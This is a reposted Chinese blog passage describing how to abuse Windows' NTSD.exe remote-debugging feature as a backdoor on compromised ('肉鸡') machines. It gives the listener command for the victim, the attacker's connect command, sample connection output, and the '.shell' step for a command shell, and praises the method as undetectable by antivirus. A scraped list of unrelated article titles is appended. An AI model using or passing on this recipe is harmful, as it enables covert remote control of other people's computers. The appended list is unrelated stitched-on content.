本文转自:http://www.iceseo.tk/Vulnerability/wei-ruan-de-hou-men-NTSD-exe-NTSD-de-yuan-cheng-diao-shi-gong-neng.html

1.肉鸡上运行:ntsd -server tcp:port=端口 要调试的程序(可以任意,只要存在即可),例如:ntsd -server tcp:port=99 calc.exe,会新弹出个窗口,并监听刚才设置端口。

2.本机运行:ntsd -remote tcp:server=IP,port=端口,例如:ntsd -remote tcp:server=192.168.1.1,port=99。会弹出一个窗口。如果参数填写正确的话,会连接上目标机器,会显示命令类似提示符的界面,同时 server 端(就是第一步监听的那个)会显示:0:000> COMPUTER\netbar (tcp 192.168.1.3, port 99) connected at Fri May 06 13:49:59 2011,表示有人连接了,同时还显示连接的机器名,用户名,连接类型,IP地址,端口,时间等信息。

3.输入:.shell,取得 shell,操作和 Cmd 完全一样,权限是服务端运行ntsd.exe的用户权限。

又是个留后门的好方法,全免杀,而且永不被杀……

这个其实是 NTSD.exe 的正常功能,远程调试功能。

转载于:https://blog.51cto.com/297020555/571697

微软的“后门”:NTSD.exe,NTSD 的远程调试功能相关推荐

  1. 转:vs2012远程调试功能的改进

    转自:http://www.cnblogs.com/fantong/archive/2012/09/17/2688342.html 不知道大家有没有遇到过这种情况,刚开发完的程序,明明在本机能够好好的 ...

  2. [转载]eclipse的远程调试功能配置

    原文地址:eclipse的远程调试功能配置作者:我的 用途:web应用部署并运行于外部(区别于eclipse环境中启动的)应用服务器中,当出现问题时,可以使用eclipse工程的源代码进行跟踪调试. ...

  3. 使用IDEA 远程调试功能,服务器代码远程调试

    文章目录 使用IDEA 远程调试功能,服务器代码远程调试 1.同步代码 2.使用IDEA 创建remote 服务器 3.启动远程连接并设置断点调试 使用IDEA 远程调试功能,服务器代码远程调试 1. ...

  4. tomcat开启远程调试功能

    在日常开发中,有时需要对远程服务器上的应用进行远程调试,对于tomcat,要进行远程调试其实很简单,只需要在启动tomcat时开启jpda服务即可. 什么是JPDA呢? JPDA(Java Platf ...

  5. JAVA远程调试功能

    JAVA 支持调试功能,本身提供了一个简单的调试工具JDB,支持设置断点及线程级的调试同时,不同的JVM通过接口的协议联系,本地的Java文件在远程JVM建立联系和通信. 一. 基本使用: 服务端配置 ...

  6. tomcat9开启远程调试功能

    1)tomcat启动配置 修改bin/setenv.sh文件导入如下变量 export JPDA_ADDRESS=0.0.0.0:8000 启动tomcat命令,启动完成后可以使用netstat命令查 ...

  7. visualstudio开始调试不执行_攻击者是如何滥用msvsmon和Windows远程调试器的

    在本文中,我们将为读者详细介绍攻击者是如何滥用msvsmon和Windows远程调试器的. 简介 让无人值守的msvsmon.exe(远程调试器监视器)处于"无需身份验证"模式是一 ...

  8. 如何为 Python 添加远程调试能力而不修改系统代码

    最近写了一些关于 Python 远程调试的扯淡向博文,第一篇是「远程调试你的 Python 代码」,第二篇是「使用 VS Code 远程调试 Python 程序」.前些日子开了一个叫做「第八个手艺人」 ...

  9. VS 远程调试 Azure Web App

    如果能够远程调试部署在 Azure 上的 Web App,将会极大的提高我们修复 bug 的效率.Visual Studio 一贯以功能强大.好用著称,当然可以通吃基于 Azure 应用的创建.发布和 ...

  10. VS.net中的远程调试

    简介: 我们开发完一个软件后,提交给客户或者放到服务器上执行,如果有问题,我们可以使用远程调试进行发现bug. 这篇文字简单介绍一下远程调试. vs.net远程调试服务 在vs.net的安装目录下,有 ...

最新文章

  1. Linux Shell ssh登录脚本
  2. 【java】增强for循环的简单使用(遍历数组)
  3. ASA用ASDM管理时报unable to launch device manager xxx.xxx.xxx.xxx
  4. pytorch中的pre-train函数模型引用及修改(增减网络层,修改某层参数等)
  5. ASP.NET Core 动作结果 - ASP.NET Core 基础教程 - 简单教程,简单编程
  6. Sql Server 邮件日志 操作
  7. 值类型与引用类型数据运算
  8. 中国营销界:震惊全球的六种“武器”
  9. 【程序员自救指南】一个证书,让我哄好了小师妹
  10. php simplexml 删除,请问一下PHP SimpleXML怎么-删除xpath节点
  11. 异常处理第一讲(SEH),筛选器异常,以及__asm的扩展,寄存器注入简介
  12. Ext js框架模拟Windows桌面菜单管理模板
  13. Spring MVC Maven 环境搭建与部署
  14. 3个你必须知道的面试新趋势, 抓住秋招尾巴拿下offer
  15. 装箱和拆箱、类型比较
  16. uml c语言函数流程图,UML流程图模板分享
  17. python糖尿病数据挖掘
  18. c#获取文件的MD5值
  19. 打开记事本文件出现黑色方块的解决办法
  20. windows7电脑备份系统教程

热门文章

  1. c语言考试答案,C语言考试题及答案
  2. 宝塔更换域名_搭建小程序之BT宝塔面板的操作使用教程
  3. 从具体案例了解知识图谱构建流程
  4. python读取csv文件出错:显示utf-8编码问题该怎么解决
  5. 第二十三章:触发器和行为(九)
  6. Spring Boot 构建电商基础秒杀项目 (二) 使用 Spring MVC 方式获取用户信息
  7. 互联网轻量级框架SSM-查缺补漏第八天(MyBatis插件plugin使用及原理)
  8. 解决只有单引号的Json格式转换成bean问题
  9. ubuntu下用户的创建、修改
  10. 在线切换主题颜色无效_HeyUI组件库 | 如何实现在线切换主题